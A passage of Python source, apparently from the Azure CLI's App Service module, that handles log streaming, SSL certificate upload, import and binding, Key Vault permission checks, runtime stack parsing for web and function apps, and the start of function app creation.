user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'begin_list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = get_pool_manager(url)
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
# Extra encode() and decode for stdout which does not surpport 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
cert_file = open(certificate_file, 'rb')
cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
''' Decrypts the .pfx file '''
p12 = OpenSSL.crypto.load_pkcs12(open(certificate_file, 'rb').read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
# If in the public cloud, check if certificate is an app service certificate, in the same or a diferent
# subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
# pylint: disable=too-few-public-methods
class _AbstractStackRuntimeHelper:
def __init__(self, cmd, linux=False, windows=False):
self._cmd = cmd
self._client = web_client_factory(cmd.cli_ctx, api_version="2021-01-01")
self._linux = linux
self._windows = windows
self._stacks = []
@property
def stacks(self):
self._load_stacks()
return self._stacks
def _get_raw_stacks_from_api(self):
raise NotImplementedError
# updates self._stacks
def _parse_raw_stacks(self, stacks):
raise NotImplementedError
def _load_stacks(self):
if self._stacks:
return
stacks = self._get_raw_stacks_from_api()
self._parse_raw_stacks(stacks)
# WebApps stack class
class _StackRuntimeHelper(_AbstractStackRuntimeHelper):
# pylint: disable=too-few-public-methods
class Runtime:
def __init__(self, display_name=None, configs=None, github_actions_properties=None, linux=False):
self.display_name = display_name
self.configs = configs if configs is not None else dict()
self.github_actions_properties = github_actions_properties
self.linux = linux
def __init__(self, cmd, linux=False, windows=False):
# TODO try and get API support for this so it isn't hardcoded
self.windows_config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version',
'dotnet': 'net_framework_version',
'dotnetcore': None
}
self.default_delimeter = "|" # character that separates runtime name from version
self.allowed_delimeters = "|:" # delimiters allowed: '|', ':'
super().__init__(cmd, linux=linux, windows=windows)
def get_stack_names_only(self, delimiter=None):
windows_stacks = [s.display_name for s in self.stacks if not s.linux]
linux_stacks = [s.display_name for s in self.stacks if s.linux]
if delimiter is not None:
windows_stacks = [n.replace(self.default_delimeter, delimiter) for n in windows_stacks]
linux_stacks = [n.replace(self.default_delimeter, delimiter) for n in linux_stacks]
if self._linux and not self._windows:
return linux_stacks
if self._windows and not self._linux:
return windows_stacks
return {LINUX_OS_NAME: linux_stacks, WINDOWS_OS_NAME: windows_stacks}
def _get_raw_stacks_from_api(self):
return list(self._client.provider.get_web_app_stacks(stack_os_type=None))
def _parse_raw_stacks(self, stacks):
for lang in stacks:
if lang.display_text.lower() == "java":
continue # info on java stacks is taken from the "java containers" stacks
for major_version in lang.major_versions:
if self._linux:
self._parse_major_version_linux(major_version, self._stacks)
if self._windows:
self._parse_major_version_windows(major_version, self._stacks, self.windows_config_mappings)
def remove_delimiters(self, runtime):
import re
runtime = re.split("[{}]".format(self.allowed_delimeters), runtime)
return self.default_delimeter.join(filter(None, runtime))
def resolve(self, display_name, linux=False):
display_name = display_name.lower()
stack = next((s for s in self.stacks if s.linux == linux and s.display_name.lower() == display_name), None)
if stack is None: # help convert previously acceptable stack names into correct ones if runtime not found
old_to_new_windows = {
"node|12-lts": "node|12lts",
"node|14-lts": "node|14lts",
"node|16-lts": "node|16lts",
"dotnet|5.0": "dotnet|5",
"dotnet|6.0": "dotnet|6",
}
old_to_new_linux = {
"dotnet|5.0": "dotnetcore|5.0",
"dotnet|6.0": "dotnetcore|6.0",
}
if linux:
display_name = old_to_new_linux.get(display_name)
else:
display_name = old_to_new_windows.get(display_name)
stack = next((s for s in self.stacks if s.linux == linux and s.display_name.lower() == display_name), None)
return stack
@classmethod
def get_site_config_setter(cls, runtime, linux=False):
if linux:
return cls.update_site_config
return cls.update_site_appsettings if 'node' in runtime.display_name.lower() else cls.update_site_config
# assumes non-java
def get_default_version(self, lang, linux=False, get_windows_config_version=False):
versions = self.get_version_list(lang, linux, get_windows_config_version)
versions.sort()
if not versions:
os = WINDOWS_OS_NAME if not linux else LINUX_OS_NAME
raise ValidationError("Invalid language type {} for OS {}".format(lang, os))
return versions[0]
# assumes non-java
def get_version_list(self, lang, linux=False, get_windows_config_version=False):
lang = lang.upper()
versions = []
for s in self.stacks:
if s.linux == linux:
l_name, v, *_ = s.display_name.upper().split("|")
if l_name == lang:
if get_windows_config_version:
versions.append(s.configs[self.windows_config_mappings[lang.lower()]])
else:
versions.append(v)
return versions
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack.configs.items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack.configs.items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
# format a (non-java) windows runtime display text
# TODO get API to return more CLI-friendly display text for windows stacks
@classmethod
def _format_windows_display_text(cls, display_text):
import re
t = display_text.upper()
t = t.replace(".NET CORE", NETCORE_RUNTIME_NAME.upper())
t = t.replace("ASP.NET", ASPDOTNET_RUNTIME_NAME.upper())
t = t.replace(".NET", DOTNET_RUNTIME_NAME)
t = re.sub(r"\(.*\)", "", t) # remove "(LTS)"
return t.replace(" ", "|", 1).replace(" ", "")
@classmethod
def _is_valid_runtime_setting(cls, runtime_setting):
return runtime_setting is not None and not runtime_setting.is_hidden and not runtime_setting.is_deprecated
@classmethod
def _get_runtime_setting(cls, minor_version, linux, java):
if not linux:
if not java:
return minor_version.stack_settings.windows_runtime_settings
return minor_version.stack_settings.windows_container_settings
if not java:
return minor_version.stack_settings.linux_runtime_settings
return minor_version.stack_settings.linux_container_settings
@classmethod
def _get_valid_minor_versions(cls, major_version, linux, java=False):
def _filter(minor_version):
return cls._is_valid_runtime_setting(cls._get_runtime_setting(minor_version, linux, java))
return [m for m in major_version.minor_versions if _filter(m)]
def _parse_major_version_windows(self, major_version, parsed_results, config_mappings):
minor_java_versions = self._get_valid_minor_versions(major_version, linux=False, java=True)
default_java_version = next(iter(minor_java_versions), None)
if default_java_version:
container_settings = default_java_version.stack_settings.windows_container_settings
# TODO get the API to return java versions in a more parseable way
for java_version in ["1.8", "11"]:
java_container = container_settings.java_container
container_version = container_settings.java_container_version
if container_version.upper() == "SE":
java_container = "Java SE"
if java_version == "1.8":
container_version = "8"
else:
container_version = "11"
runtime_name = "{}|{}|{}|{}".format("java",
java_version,
java_container,
container_version)
gh_actions_version = "8" if java_version == "1.8" else java_version
gh_actions_runtime = "{}, {}, {}".format(java_version,
java_container.lower().replace(" se", ""),
container_settings.java_container_version.lower())
if java_container == "Java SE": # once runtime name is set, reset configs to correct values
java_container = "JAVA"
container_version = "SE"
runtime = self.Runtime(display_name=runtime_name,
configs={"java_version": java_version,
"java_container": java_container,
"java_container_version": container_version},
github_actions_properties={"github_actions_version": gh_actions_version,
"app_runtime": "java",
"app_runtime_version": gh_actions_runtime},
linux=False)
parsed_results.append(runtime)
else:
minor_versions = self._get_valid_minor_versions(major_version, linux=False, java=False)
for minor_version in minor_versions:
settings = minor_version.stack_settings.windows_runtime_settings
runtime_name = self._format_windows_display_text(minor_version.display_text)
runtime = self.Runtime(display_name=runtime_name, linux=False)
lang_name = runtime_name.split("|")[0].lower()
config_key = config_mappings.get(lang_name)
if config_key:
runtime.configs[config_key] = settings.runtime_version
gh_properties = settings.git_hub_action_settings
if gh_properties.is_supported:
runtime.github_actions_properties = {"github_actions_version": gh_properties.supported_version}
parsed_results.append(runtime)
def _parse_major_version_linux(self, major_version, parsed_results):
minor_java_versions = self._get_valid_minor_versions(major_version, linux=True, java=True)
default_java_version_linux = next(iter(minor_java_versions), None)
if default_java_version_linux:
linux_container_settings = default_java_version_linux.stack_settings.linux_container_settings
runtimes = [(linux_container_settings.java11_runtime, "11"), (linux_container_settings.java8_runtime, "8")]
for runtime_name, version in [(r, v) for (r, v) in runtimes if r is not None]:
runtime = self.Runtime(display_name=runtime_name,
configs={"linux_fx_version": runtime_name},
github_actions_properties={"github_actions_version": version},
linux=True,
)
parsed_results.append(runtime)
else:
minor_versions = self._get_valid_minor_versions(major_version, linux=True, java=False)
for minor_version in minor_versions:
settings = minor_version.stack_settings.linux_runtime_settings
runtime_name = settings.runtime_version
runtime = self.Runtime(display_name=runtime_name,
configs={"linux_fx_version": runtime_name},
linux=True,
)
gh_properties = settings.git_hub_action_settings
if gh_properties.is_supported:
runtime.github_actions_properties = {"github_actions_version": gh_properties.supported_version}
parsed_results.append(runtime)
# override _load_stacks() to call this method to use hardcoded stacks
def _load_stacks_hardcoded(self):
import os
stacks_file = os.path.abspath(os.path.join(os.path.abspath(__file__), '../resources/WebappRuntimeStacks.json'))
if self._stacks:
return
stacks = []
if self._linux:
stacks_json = get_file_json(stacks_file)['linux']
for r in stacks_json:
stacks.append(self.Runtime(display_name=r.get("displayName"),
configs=r.get("configs"),
github_actions_properties=r.get("github_actions_properties"),
linux=True))
if self._windows: # Windows stacks
stacks_json = get_file_json(stacks_file)['windows']
for r in stacks_json:
stacks.append(self.Runtime(display_name=r.get("displayName"),
configs=r.get("configs"),
github_actions_properties=r.get("github_actions_properties"),
linux=False))
self._stacks = stacks
class _FunctionAppStackRuntimeHelper(_AbstractStackRuntimeHelper):
# pylint: disable=too-few-public-methods,too-many-instance-attributes
class Runtime:
def __init__(self, name=None, version=None, is_preview=False, supported_func_versions=None, linux=False,
app_settings_dict=None, site_config_dict=None, app_insights=False, default=False):
self.name = name
self.version = version
self.is_preview = is_preview
self.supported_func_versions = [] if not supported_func_versions else supported_func_versions
self.linux = linux
self.app_settings_dict = dict() if not app_settings_dict else app_settings_dict
self.site_config_dict = dict() if not site_config_dict else site_config_dict
self.app_insights = app_insights
self.default = default
self.display_name = "{}|{}".format(name, version) if version else name
# used for displaying stacks
def to_dict(self):
return {"runtime": self.name,
"version": self.version,
"supported_functions_versions": self.supported_func_versions}
def __init__(self, cmd, linux=False, windows=False):
self.disallowed_functions_versions = {"~1", "~2"}
self.KEYS = FUNCTIONS_STACKS_API_KEYS()
super().__init__(cmd, linux=linux, windows=windows)
def resolve(self, runtime, version=None, functions_version=None, linux=False):
stacks = self.stacks
runtimes = [r for r in stacks if r.linux == linux and runtime == r.name]
os = LINUX_OS_NAME if linux else WINDOWS_OS_NAME
if not runtimes:
supported_runtimes = [r.name for r in stacks if r.linux == linux]
raise ValidationError("Runtime {0} not supported for os {1}. Supported runtimes for os {1} are: {2}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(runtime, os, supported_runtimes))
if version is None:
return self.get_default_version(runtime, functions_version, linux)
matched_runtime_version = next((r for r in runtimes if r.version == version), None)
if not matched_runtime_version:
# help convert previously acceptable versions into correct ones if match not found
old_to_new_version = {
"11": "11.0",
"8": "8.0"
}
new_version = old_to_new_version.get(version)
matched_runtime_version = next((r for r in runtimes if r.version == new_version), None)
if not matched_runtime_version:
versions = [r.version for r in runtimes]
raise ValidationError("Invalid version: {0} for runtime {1} and os {2}. Supported versions for runtime "
"{1} and os {2} are: {3}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(version, runtime, os, versions))
if functions_version not in matched_runtime_version.supported_func_versions:
supported_func_versions = matched_runtime_version.supported_func_versions
raise ValidationError("Functions version {} is not supported for runtime {} with version {} and os {}. "
"Supported functions versions are {}. "
"Run 'az functionapp list-runtimes' for more details on supported runtimes. "
.format(functions_version, runtime, version, os, supported_func_versions))
return matched_runtime_version
def get_default_version(self, runtime, functions_version, linux=False):
runtimes = [r for r in self.stacks if r.linux == linux and r.name == runtime]
runtimes.sort(key=lambda r: r.default, reverse=True) # make runtimes with default=True appear first
for r in runtimes:
if functions_version in r.supported_func_versions:
return r
raise ValidationError("Could not find a runtime version for runtime {} with functions version {} and os {}"
"Run 'az functionapp list-runtimes' for more details on supported runtimes. ")
def _get_raw_stacks_from_api(self):
return list(self._client.provider.get_function_app_stacks(stack_os_type=None))
# remove non-digit or non-"." chars
@classmethod
def _format_version_name(cls, name):
import re
return re.sub(r"[^\d\.]", "", name)
# format version names while maintaining uniqueness
def _format_version_names(self, runtime_to_version):
formatted_runtime_to_version = {}
for runtime, versions in runtime_to_version.items():
formatted_runtime_to_version[runtime] = formatted_runtime_to_version.get(runtime, dict())
for version_name, version_info in versions.items():
formatted_name = self._format_version_name(version_name)
if formatted_name in formatted_runtime_to_version[runtime]:
formatted_name = version_name.lower().replace(" ", "-")
formatted_runtime_to_version[runtime][formatted_name] = version_info
return formatted_runtime_to_version
@classmethod
def _format_function_version(cls, v):
return v.replace("~", "")
def _get_valid_function_versions(self, runtime_settings):
supported_function_versions = runtime_settings.supported_functions_extension_versions
valid_versions = []
for v in supported_function_versions:
if v not in self.disallowed_functions_versions:
valid_versions.append(self._format_version_name(v))
return valid_versions
def _parse_minor_version(self, runtime_settings, major_version_name, minor_version_name, runtime_to_version):
if not runtime_settings.is_deprecated:
functions_versions = self._get_valid_function_versions(runtime_settings)
if functions_versions:
runtime_version_properties = {
self.KEYS.IS_PREVIEW: runtime_settings.is_preview,
self.KEYS.SUPPORTED_EXTENSION_VERSIONS: functions_versions,
self.KEYS.APP_SETTINGS_DICT: runtime_settings.app_settings_dictionary,
self.KEYS.APPLICATION_INSIGHTS: runtime_settings.app_insights_settings.is_supported,
self.KEYS.SITE_CONFIG_DICT: runtime_settings.site_config_properties_dictionary,
self.KEYS.IS_DEFAULT: bool(runtime_settings.is_default),
}
runtime_name = (runtime_settings.app_settings_dictionary.get(self.KEYS.FUNCTIONS_WORKER_RUNTIME) or
major_version_name)
runtime_to_version[runtime_name] = runtime_to_version.get(runtime_name, dict())
runtime_to_version[runtime_name][minor_version_name] = runtime_version_properties
def _create_runtime_from_properties(self, runtime_name, version_name, version_properties, linux):
supported_func_versions = version_properties[self.KEYS.SUPPORTED_EXTENSION_VERSIONS]
return self.Runtime(name=runtime_name,
version=version_name,
is_preview=version_properties[self.KEYS.IS_PREVIEW],
supported_func_versions=supported_func_versions,
linux=linux,
site_config_dict=version_properties[self.KEYS.SITE_CONFIG_DICT],
app_settings_dict=version_properties[self.KEYS.APP_SETTINGS_DICT],
app_insights=version_properties[self.KEYS.APPLICATION_INSIGHTS],
default=version_properties[self.KEYS.IS_DEFAULT],
)
def _parse_raw_stacks(self, stacks):
# build a map of runtime -> runtime version -> runtime version properties
runtime_to_version_linux = {}
runtime_to_version_windows = {}
for runtime in stacks:
for major_version in runtime.major_versions:
for minor_version in major_version.minor_versions:
runtime_version = minor_version.value
linux_settings = minor_version.stack_settings.linux_runtime_settings
windows_settings = minor_version.stack_settings.windows_runtime_settings
if linux_settings is not None:
self._parse_minor_version(runtime_settings=linux_settings,
major_version_name=runtime.name,
minor_version_name=runtime_version,
runtime_to_version=runtime_to_version_linux)
if windows_settings is not None:
self._parse_minor_version(runtime_settings=windows_settings,
major_version_name=runtime.name,
minor_version_name=runtime_version,
runtime_to_version=runtime_to_version_windows)
runtime_to_version_linux = self._format_version_names(runtime_to_version_linux)
runtime_to_version_windows = self._format_version_names(runtime_to_version_windows)
for runtime_name, versions in runtime_to_version_windows.items():
for version_name, version_properties in versions.items():
r = self._create_runtime_from_properties(runtime_name, version_name, version_properties, linux=False)
self._stacks.append(r)
for runtime_name, versions in runtime_to_version_linux.items():
for version_name, version_properties in versions.items():
r = self._create_runtime_from_properties(runtime_name, version_name, version_properties, linux=True)
self._stacks.append(r)
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku, number_of_workers=None,
max_burst=None, location=None, tags=None, zone_redundant=False):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_tier(sku)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
"be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
functions_version = '3'
if deployment_source_url and deployment_local_git:
raise MutuallyExclusiveArgumentError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise MutuallyExclusiveArgumentError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
from azure.mgmt.web.models import Site
SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
